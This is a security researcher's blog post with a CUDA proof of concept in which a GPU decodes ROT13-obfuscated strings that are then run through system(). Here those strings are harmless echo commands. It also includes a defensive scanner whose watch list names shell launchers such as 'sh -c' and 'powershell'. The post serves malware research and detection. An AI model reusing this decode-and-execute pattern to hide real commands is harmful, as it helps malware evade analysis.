After my Ruxcon talk on GPGPU malware, some people doubted that malware could use GPUs at all, and argued that even if it did, it would be just like normal malware (and since I did not provide any code sample at the conference, I can understand the frustration).
Here is a small code sample to convince the unconvinced: it contains encrypted strings that are sent to the GPU to be decrypted. Once decrypted, they are executed in a shell.
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <cuda.h>

#define MAX_SIZE 255

// caution: kickass encryption ahead
__global__ void decodeOnDevice(char *a)
{
    char cap;
    int i = 0;

    // test the bound before reading a[i]
    while (i < MAX_SIZE && a[i]) {
        cap = a[i] & 32;   // remember the case bit
        a[i] &= ~cap;      // fold letters to upper case
        a[i] = ((a[i] >= 'A') && (a[i] <= 'Z') ? ((a[i] - 'A' + 13) % 26 + 'A') : a[i]) | cap;
        i++;
    }
}

int main(void)
{
    char *temp_host;    // pointer to host memory
    char *temp_device;  // pointer to device memory
    char commands[2][MAX_SIZE];
    int i;

    // allocate array on host
    temp_host = (char *)malloc(MAX_SIZE);
    // allocate array on device
    cudaMalloc((void **) &temp_device, MAX_SIZE);

    // initialize host data
    memset(commands[0], 0, MAX_SIZE);
    memset(commands[1], 0, MAX_SIZE);

    // these are the encoded commands
    memcpy(commands[0], "rpub Jung vf lbhe anzr, unaqfbzr xavtug?", strlen("rpub Jung vf lbhe anzr, unaqfbzr xavtug?"));
    memcpy(commands[1], "rpub - Fve Tnynunq... gur Punfgr.", strlen("rpub - Fve Tnynunq... gur Punfgr."));

    for (i = 0; i < 2; i++) {
        memset(temp_host, 0, MAX_SIZE);
        memcpy(temp_host, commands[i], strlen(commands[i]));

        // send data from host to device
        cudaMemcpy(temp_device, temp_host, MAX_SIZE, cudaMemcpyHostToDevice);

        // data copied on device, invoking kernel
        decodeOnDevice <<< 1, 1 >>> (temp_device);

        // retrieve data from device
        cudaMemcpy(temp_host, temp_device, MAX_SIZE, cudaMemcpyDeviceToHost);

        // execute the decoded command
        system(temp_host);
    }

    // release device and host buffers
    cudaFree(temp_device);
    free(temp_host);
    return 0;
}
```
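
From the analyst's side, the strings in this sample never appear decoded in the file on disk, so a plain strings pass shows only the encoded form. The following added example (not part of the original post) is a CPU-side triage scanner that applies the same ROT13 transform as `decodeOnDevice` to every printable run in a buffer and reports runs that decode to a command prefix; the `WATCH` list, `MIN_RUN` and the `SAMPLE` buffer are constructed assumptions.

```c
#include <stdio.h>
#include <string.h>
#define MAX_SIZE 255   /* same buffer size as the page's sample */
#define MIN_RUN  6     /* assumption: ignore printable runs shorter than this */
/* Assumption: constructed watch list of command prefixes, not from the page. */
static const char *WATCH[] = { "echo ", "sh -c ", "cmd /c ", "powershell " };

/* CPU reference of decodeOnDevice: ROT13 on ASCII letters, case preserved. */
static void rot13(const unsigned char *in, size_t n, char *out) {
    for (size_t i = 0; i < n; i++) {
        char c = (char)in[i];
        if (c >= 'a' && c <= 'z') c = (char)((c - 'a' + 13) % 26 + 'a');
        else if (c >= 'A' && c <= 'Z') c = (char)((c - 'A' + 13) % 26 + 'A');
        out[i] = c;
    }
    out[n] = '\0';
}

/* Walk printable runs in buf, ROT13 each, keep those that decode to a watched prefix. */
int scan_rot13_commands(const unsigned char *buf, size_t len,
                        char hits[][MAX_SIZE], int max_hits) {
    int found = 0;
    size_t start = 0, i, w;
    for (i = 0; i <= len; i++) {
        if (i < len && buf[i] >= 0x20 && buf[i] < 0x7f) continue;  /* still in a run */
        size_t run = i - start;
        if (run >= MIN_RUN && run < MAX_SIZE && found < max_hits) {
            char dec[MAX_SIZE];
            rot13(buf + start, run, dec);
            for (w = 0; w < sizeof WATCH / sizeof WATCH[0]; w++)
                if (strncmp(dec, WATCH[w], strlen(WATCH[w])) == 0) {
                    strcpy(hits[found++], dec);
                    break;
                }
        }
        start = i + 1;  /* next run begins after this non-printable byte */
    }
    return found;
}

/* Constructed sample image: the page's two encoded strings among unrelated bytes. */
static const unsigned char SAMPLE[] =
    "\x7f" "ELF\0\x01\x02" "rpub Jung vf lbhe anzr, unaqfbzr xavtug?\0"
    "usage: demo [options]\0\x03" "rpub - Fve Tnynunq... gur Punfgr.";

int main(void) {
    char hits[8][MAX_SIZE];
    int n = scan_rot13_commands(SAMPLE, sizeof SAMPLE, hits, 8);
    for (int k = 0; k < n; k++) printf("ROT13 command string: %s\n", hits[k]);
}
```

This only works because the transform here is a fixed, keyless substitution; it says nothing about samples that use a different encoding.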